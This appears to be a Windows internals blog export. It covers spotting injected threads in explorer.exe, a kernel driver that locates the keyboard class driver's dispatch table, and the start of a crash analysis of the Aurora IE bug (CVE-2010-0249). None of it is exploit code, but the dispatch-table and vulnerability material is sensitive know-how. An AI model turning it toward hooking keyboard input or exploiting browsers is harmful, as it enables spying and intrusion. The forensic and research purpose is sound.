New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> </pre></pre><br /><p>Here are a few of the threads' base (Win32 start) addresses from the list.</p><br /><p> THREAD 828f02a0 Cid 0594.06d4 Teb: 7ffa8000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode <br /><p>Non-Alertable<br> 827acd28 NotificationEvent<br> 823a7220 SynchronizationEvent<br> Not impersonating<br> DeviceMap e1cba0b0<br> Owning Process 827f9020 Image: explorer.exe<br> Attached Process N/A Image: N/A<br> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br> Context Switch Count 17 <br> UserTime 00:00:00.000<br> KernelTime 00:00:00.000<br> Win32 Start Address 0x02476cf6<br /><p> <p>If you look up the address 0x02476cf6 (region 02470000) for explorer.exe in the VMMap tool, you can see that the address lies in a data region that has execute permission, which raises suspicion.<br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhocG6MaGfLldUSE8QMv0H4cr3l2Wh0KoR8mUrBJAEHjWezC5mre9aibYe2JRveuQ0p-2YigHpJWnRG42qGUukf8JCgJ0u5ZrwDhNQFvI33MsjFMHhn_OPAaU3h4Sx9SaE8v-eNKUo3Ttfk/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="77" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxbKZIuXog0ZlLBwcPVQFLriFzmP380aYDw4WCQWl1SmmwmzyuuWSuJ6DbVI9bpl7kkD72DfGOZ_YnFtZH9kl83HJkFaTm4GybApO9_4qvXiPBuJg9hHrOeRtCdyjUSDx3fx1Z9zQGyd2p//?imgmax=800" width="657" border="0"></a> <br /><p> <p>So we need to check which address ranges the start addresses of the different threads fall into.<br /><p>There may be many easier and more accurate ways. 
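<p>The check just described, automated as an added example (this is not code from the original post): each thread's Win32 start address is looked up in the process memory map and flagged when it falls in a private region with execute permission instead of in a loaded image. The region list, the type <code>region_t</code> and the function names are assumptions made here; the map is constructed to mirror the explorer.exe case, and on a live process it would be collected with VirtualQueryEx.</p>

```c
/* Added example, not from the original post: classify a thread's Win32 start
 * address against the process memory map, the check the post does by hand in
 * VMMap. A constructed map mirrors the explorer.exe case so it runs anywhere. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Region type and page protection values as reported by VirtualQueryEx. */
#define MEM_PRIVATE            0x00020000u
#define MEM_IMAGE              0x01000000u
#define PAGE_READWRITE         0x04u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define PAGE_EXECUTE_WRITECOPY 0x80u

typedef struct {
    uint32_t base;    /* region base address (32-bit XP process) */
    uint32_t size;    /* region size in bytes */
    uint32_t type;    /* MEM_IMAGE or MEM_PRIVATE (mapped data is treated like private) */
    uint32_t protect; /* PAGE_* protection */
} region_t;

typedef enum {
    START_UNMAPPED = 0,   /* no region holds the address: very suspicious */
    START_IN_IMAGE,       /* backed by a loaded module: the normal case */
    START_IN_DATA_NOEXEC, /* data region without execute: the thread would fault */
    START_IN_DATA_EXEC    /* executable data region: the post's explorer.exe case */
} start_verdict_t;

static int is_executable(uint32_t protect)
{
    return (protect & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                       PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* Return the region containing addr, or NULL when the address is unmapped. */
static const region_t *find_region(uint32_t addr, const region_t *map, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (addr >= map[i].base && addr - map[i].base < map[i].size)
            return &map[i];
    return NULL;
}

/* The check the post performs by eye: a start not backed by an image but in executable memory. */
start_verdict_t classify_thread_start(uint32_t start, const region_t *map, size_t n)
{
    const region_t *r = find_region(start, map, n);
    if (r == NULL)
        return START_UNMAPPED;
    if (r->type == MEM_IMAGE)
        return START_IN_IMAGE;
    return is_executable(r->protect) ? START_IN_DATA_EXEC : START_IN_DATA_NOEXEC;
}

/* Count the thread starts in a list that are unmapped or in executable data. */
size_t count_suspicious_starts(const uint32_t *starts, size_t nstarts,
                               const region_t *map, size_t nmap)
{
    size_t i, hits = 0;
    for (i = 0; i < nstarts; i++) {
        start_verdict_t v = classify_thread_start(starts[i], map, nmap);
        if (v == START_UNMAPPED || v == START_IN_DATA_EXEC)
            hits++;
    }
    return hits;
}

/* Constructed map modelled on the post's explorer.exe: the main module, ntdll, one
 * thread stack and the private 0x02470000 region. Only 0x02470000 is from the post. */
static const region_t sample_map[] = {
    { 0x01000000u, 0x000FF000u, MEM_IMAGE,   PAGE_EXECUTE_READ },      /* explorer.exe */
    { 0x7C900000u, 0x000B0000u, MEM_IMAGE,   PAGE_EXECUTE_READ },      /* ntdll.dll */
    { 0x0219F000u, 0x00001000u, MEM_PRIVATE, PAGE_READWRITE },         /* thread stack */
    { 0x02470000u, 0x00010000u, MEM_PRIVATE, PAGE_EXECUTE_READWRITE }, /* data + execute */
};
#define SAMPLE_MAP_LEN (sizeof sample_map / sizeof sample_map[0])

/* Constructed starts: inside explorer.exe, the post's 0x02476cf6 thread, and an unmapped one. */
static const uint32_t sample_starts[] = { 0x01012345u, 0x02476cf6u, 0x00400000u };

/* Run the check against the constructed map for one start address. */
start_verdict_t check_sample(uint32_t start)
{
    return classify_thread_start(start, sample_map, SAMPLE_MAP_LEN);
}

int main(void)
{
    static const char *names[] = { "unmapped", "image", "data, no exec", "data + exec" };
    size_t i;
    for (i = 0; i < 3; i++)
        printf("start 0x%08x: %s\n", (unsigned)sample_starts[i], names[check_sample(sample_starts[i])]);
    printf("suspicious starts: %u\n",
           (unsigned)count_suspicious_starts(sample_starts, 3, sample_map, SAMPLE_MAP_LEN));
    return 0;
}
```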
The manual walk through the debugger output above is one of the ways I work it out.<br /><p>References:<br /><p><a title="http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx" href="http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx">http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx</a><br /><p><a title="http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf" href="http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf">http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf</a> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-61181106557916850532011-10-23T06:53:00.001-07:002011-10-23T07:12:42.993-07:00Enumerating a DRIVER_OBJECT using Driver Code<p> </p> <p>A driver object has the following structure.</p><pre>typedef struct _DRIVER_OBJECT<br />{<br /> SHORT Type;<br /> SHORT Size;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/DEVICE_OBJECT.html">PDEVICE_OBJECT</a> DeviceObject;<br /> ULONG Flags;<br /> PVOID DriverStart;<br /> ULONG DriverSize;<br /> PVOID DriverSection;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/DRIVER_EXTENSION.html">PDRIVER_EXTENSION</a> DriverExtension;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html">UNICODE_STRING</a> DriverName;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html">PUNICODE_STRING</a> HardwareDatabase;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/FAST_IO_DISPATCH.html">PFAST_IO_DISPATCH</a> FastIoDispatch;<br /> LONG * DriverInit;<br /> PVOID DriverStartIo;<br /> PVOID DriverUnload;<br /> LONG * MajorFunction[28];<br />} DRIVER_OBJECT, *PDRIVER_OBJECT;</pre><br /><p>Looking at a driver in the DeviceTree utility </p><br /><p>The following is the driver related to the keyboard</p><br /><p><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK4Dfx4TGjxjGTcR06Er3Vc47ls-zlb9B1VKpMGBVfBGv3IPqQIxOrUgB03q8Zx_oKVybYvb5EMzpGZffvbMSyWqmTPVIPz8SDFcQbnb2_nk3OM-jVdh0-1HgrowkcZGBr87SeLO79KhT/s1600-h/image%25255B8%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="148" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEcK5rpjrT6OdnQ2dZ7EoVaPumQoKUL46uzZO_XB8bPAJf6zRUC0rieJHXK_OJe6npjDpDWhC8IMn3Ebf1fEajL5sGkqoEqjqVCKh8xodv1-SToAnb04VzJXxIiuBGrrYI1b6GddvEDSy//?imgmax=800" width="510" border="0"></a> </p><br /><p>Using WinDbg we can see the structure of the driver.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 507px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 85px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !drvobj kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver object (8186aae8) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: 
consolas,'Courier New',courier,monospace; background-color: #ffffff">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre></pre><br /><p>Let's look at the device object at 81864860.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 510px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 101px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !devobj 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device object (81864860) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KeyboardClass0 \Driver\Kbdclass DriverObject 8186aae8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Current Irp 00000000 RefCount 1 Type 0000000b Flags 00002044</pre></pre><br /><p>Now let's look at the DriverObject at 8186aae8, the driver object that KeyboardClass0 belongs to.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 513px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 99px; background-color: #fbfbfb"><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !drvobj 8186AAE8 7<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver object (8186aae8) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">DriverEntry: f9cb0610 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">DriverStartIo: 00000000 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">DriverUnload: 00000000 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff">AddDevice: f9cafb02 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Dispatch routines:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[00] IRP_MJ_CREATE f9cacdd8 +0xf9cacdd8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[01] IRP_MJ_CREATE_NAMED_PIPE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[02] IRP_MJ_CLOSE f9cacfe8 +0xf9cacfe8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[03] IRP_MJ_READ f9cadc82 +0xf9cadc82<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[04] IRP_MJ_WRITE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[05] IRP_MJ_QUERY_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[06] IRP_MJ_SET_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[07] IRP_MJ_QUERY_EA 804f320e nt!IopInvalidDeviceRequest<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[08] IRP_MJ_SET_EA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[09] IRP_MJ_FLUSH_BUFFERS f9cacd50 +0xf9cacd50<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0a] IRP_MJ_QUERY_VOLUME_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0b] IRP_MJ_SET_VOLUME_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0c] IRP_MJ_DIRECTORY_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0d] IRP_MJ_FILE_SYSTEM_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0e] IRP_MJ_DEVICE_CONTROL f9caea44 +0xf9caea44<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL f9cae386 +0xf9cae386<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[10] IRP_MJ_SHUTDOWN 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
background-color: #ffffff">[11] IRP_MJ_LOCK_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[12] IRP_MJ_CLEANUP f9cacd0c +0xf9cacd0c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[13] IRP_MJ_CREATE_MAILSLOT 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[14] IRP_MJ_QUERY_SECURITY 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[15] IRP_MJ_SET_SECURITY 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[16] IRP_MJ_POWER f9caf196 +0xf9caf196<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[17] IRP_MJ_SYSTEM_CONTROL f9cae844 +0xf9cae844<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[18] IRP_MJ_DEVICE_CHANGE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[19] IRP_MJ_QUERY_QUOTA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[1a] IRP_MJ_SET_QUOTA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: 
consolas,'Courier New',courier,monospace; background-color: #ffffff">[1b] IRP_MJ_PNP f9cad798 +0xf9cad798</pre></pre><br /><p>Now let's write kernel-mode driver code to do the same thing: look up the device object by name, follow its DriverObject back-pointer, and read the DeviceObject list head and the MajorFunction dispatch table that !drvobj printed above.</p><pre>/*
kd> !drvobj kbdclass
Driver object (8186aae8) is for:
 \Driver\Kbdclass
Driver Extension List: (id , addr)

Device Object list:
81798a58 81864860 

kd> !devobj 81864860 
Device object (81864860) is for:
 KeyboardClass0 \Driver\Kbdclass DriverObject 8186aae8
Current Irp 00000000 RefCount 1 Type 0000000b Flags 00002044
Dacl e13ae02c DevExt 81864918 DevObjExt 818649f8 
ExtensionFlags (0000000000) 
AttachedTo (Lower) 81864a58*** ERROR: Module load completed but symbols could not be loaded for nmfilter.sys
 \Driver\nmfilter
Device queue is not busy.
kd> !drvobj 8186AAE8
Driver object (8186aae8) is for:
 \Driver\Kbdclass
Driver Extension List: (id , addr)

Device Object list:
81798a58 81864860 
//out of the code
addr of drivr=8186AAE8 
addr of device =81798A58 
addr of irp =F9CACDD8 

*/

#include <ntddk.h>

VOID DriverUnload(IN PDRIVER_OBJECT DriverObject);

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    PDRIVER_OBJECT drvcopy;
    PDEVICE_OBJECT devcopy;
    UNICODE_STRING DeviceName;
    PDEVICE_OBJECT device;
    PFILE_OBJECT file;
    NTSTATUS s;

    UNREFERENCED_PARAMETER(RegistryPath);

    DbgPrint("driver 7\n"); // variables must be declared before the first statement

    // Resolve the device name to its DEVICE_OBJECT. The call also returns a
    // referenced FILE_OBJECT that has to be released with ObDereferenceObject.
    RtlInitUnicodeString(&DeviceName, L"\\Device\\KeyboardClass0");
    s = IoGetDeviceObjectPointer(&DeviceName, FILE_ALL_ACCESS, &file, &device);

    if (!NT_SUCCESS(s))
    {
        DbgPrint("Get Device error!\n");
        return s;
    }

    // DEVICE_OBJECT.DriverObject points back to the owning DRIVER_OBJECT
    // (8186aae8 in the !devobj output above)
    drvcopy = device->DriverObject;
    DbgPrint("addr of driver=%p \n", drvcopy);

    // DRIVER_OBJECT.DeviceObject is the head of the driver's device list
    // (81798a58, the first entry of "Device Object list" above)
    devcopy = drvcopy->DeviceObject;
    DbgPrint("addr of device =%p \n", devcopy);

    // MajorFunction[] is the dispatch table; index 0 is IRP_MJ_CREATE
    DbgPrint("addr of irp =%p \n", drvcopy->MajorFunction[IRP_MJ_CREATE]);

    // Release the file object reference taken by IoGetDeviceObjectPointer;
    // holding it would keep the keyboard device from ever being cleaned up
    ObDereferenceObject(file);

    DriverObject->DriverUnload = DriverUnload;

    return STATUS_SUCCESS;
}

VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Driver Unload! \n");
}</pre><br /><p>We can see the output in DebugView.</p><br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzvH1RJkPrkLWF_r7xeCaKf6KaVfbWtwIqx0l09ml7VkFhyphenhyphensFPfSMHgnnFBo5xt-vcfxskwiazzegBmEzRbFn_-r6x0jM1_EdBhiD3YtWxYmCq7M-I1ov8X-ScTGDTqQ6ijZGO9T5nPBGi/s1600-h/image%25255B10%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="236" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihKDtxwDYfLTJAq9LljNcFGexryLlRKIFTJdgHom4Y3hFVhgQQKIpJS0GidcnA3MYM07akdyVjjXYMy0UEZ56iPIQu4WNwCqv2mwH68O9_Hs7iXoCa_htUG39cZBYlHbE7shzNTS61vxMd//?imgmax=800" width="536" border="0"></a> </p><br /><p>The “addr of irp” in the figure is the address of the IRP_MJ_CREATE dispatch routine, f9cacdd8 in the !drvobj listing above.</p><br /><h4><font color="#0000ff">That's it.</font></h4> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-20476653248985061792011-10-16T02:55:00.001-07:002011-10-18T00:56:32.875-07:00Reversing the Aurora Vulnerability CVE-2010-0249:<p>Well, this is a year-old vulnerability, but I thought of documenting it as it was quite famous and was all over the television news. Here are some links:</p> <p><a title="http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html" href="http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html">http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html</a></p> <p><a title="http://www.wired.com/threatlevel/2010/01/operation-aurora/" href="http://www.wired.com/threatlevel/2010/01/operation-aurora/">http://www.wired.com/threatlevel/2010/01/operation-aurora/</a>.</p> <p>Enough of stories. 
</p> <p>Let's move on to the technical analysis.</p> <p>I picked up a PoC from the internet and tested it on my XP SP2.</p> <p>I opened IE under windbg and loaded the PoC html in IE. IE crashed at the following location.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU6qrvaZykoBe3re8QDa2puopLvb2aAd95LjF7EwxPYhHRfwxu4sFo39q4eOlU2mNBILX8d8Rxo8W3CscioT7BquHRO1cF1U9DznFgW14y-UbxlNxrj68ABk7cRT8DamcLNZI6zAnr-aS_/s1600-h/image%25255B3%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="164" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyphenhyphenTY-os6UIvVxUNl7YWEwcHn8mxy3pykh7oDumnF0vnLHO2DwIZan4VlJDf0VghLowcNXSxJIOG4pbLahZW0GSSWWIsdy42z_vPTLML3hEzI8olwy0lKyX7mRpuBSxj8vz-46Yn6a55wR//?imgmax=800" width="505" border="0"></a></p> <p>Looking at the disassembly of the location:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMm1lf00Qgr-bzsVCo8SJwPE4wLclGm0jBICQnH1n5-gi5NdYR2upzlAUYKuK9krzgDvzgI5zOpgX_VuX2NEnIUp3ykajI5yVx6MyqPl-b25WZ2Tm0rLUQF4T8hJV2BPDCVaZbMvgma4f/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="137" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxFdWtqJJcBQnblzAGmNQ-bhURe2J8Ro8fAgoxf6XqNNO40i9FL8xFHxMzAOexdZ7EDNh4OyH3VXFshyNroP5upm8juJZ3opFFcl0ERtQbv7SJ56czxKmx-BLkN9ZfIJRm5rzq9SozKOs6//?imgmax=800" width="515" border="0"></a> </p> <p>We see that the crash happens in GetDocPtr.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZOBZ25uJYmVj4c7oaXWRaizBhTrzezs3V4V00bJI32CQvMovdQCz2jco-07Mx48e4fIIUbwKtAp6ypijcLCwsqR3KKhRoloYs9IIfo8a5nyokBXANQsrSq57ZNFfQk_yNHgAJSipdcmEv/s1600-h/image%25255B16%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; 
border-bottom-width: 0px; border-right-width: 0px" height="95" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzVY7jsVRjbb7jo0Rc47uVU4QfWEXWrw-jXyZZanNqgsVL-Ul11Ektgqm9ghYYfTduZ19XoJOojT9tCNlkqPFiO1BLHS_IfAy5_ZycYfuEFyynLw1N3aKPg7AQUOJsKCcN6Kq0JCtSMWsQ//?imgmax=800" width="510" border="0"></a> </p> <p>It looks like the address pointed to by the ecx register holds invalid data, which causes the access violation.</p> <p>Looking at the stack trace:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLiGo-Rh8m9n7kjsRfuGSGOoHnHxGClgpm2tmP5u3xXX3t25U9sq689Dwr8G9BiBmALB_rpQ5w0xWjW8BRaaOESQO2xTUi-WhxrW-xlhDfb22Q2DZ9vnDKQ4hGU7Oym6VPd5oAAom-KNG2/s1600-h/image%25255B20%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="139" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLSkIKnYIcerg_1cuTCAS_OaJTd1magxlsdsIsVZPwnyw4pquthyphenhyphenczWJqbFYLNtNdCgVkg9a2dWjh7pVq1xDcgh6oPbIRAJrNcX1Nod9zSFrE5Vfbxb5hTXKcgiP_sHxMY_OYEtYybSwP//?imgmax=800" width="530" border="0"></a> </p> <p>Looking at the function mshtml!CEventObj::GenericGetElement:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujeov5uEse8bC5VV4RKDcMab9p5FVMATe5-8F3w7x-dj4AbnMPy76kj3UgmnbfavMbBS-OCTeP4WnghyoB7Ruq_WLkzfmEGSAZvaQEO1CUbGImTX9yFaFF4XGfuxXSi8D4sGiPCwhyphenhypheng9Y/s1600-h/image%25255B24%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="114" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgldHI1pmP48ta2vUNTp_k9MnP3Jm7VmyUJELjhpvwALEkKwxvgibmGL4wm70u2akpSp3Bpp-O9T_TU4bzy5_3paWwJRuJVTJwYLDLXnLAPbHj9pPTs9PVhyphenhyphenaAYR0Rw06-c9_AuKsFB3dV8//?imgmax=800" width="542" border="0"></a> </p> <p>It looks like the ecx value is derived from the value at the address pointed to by esi.</p> 
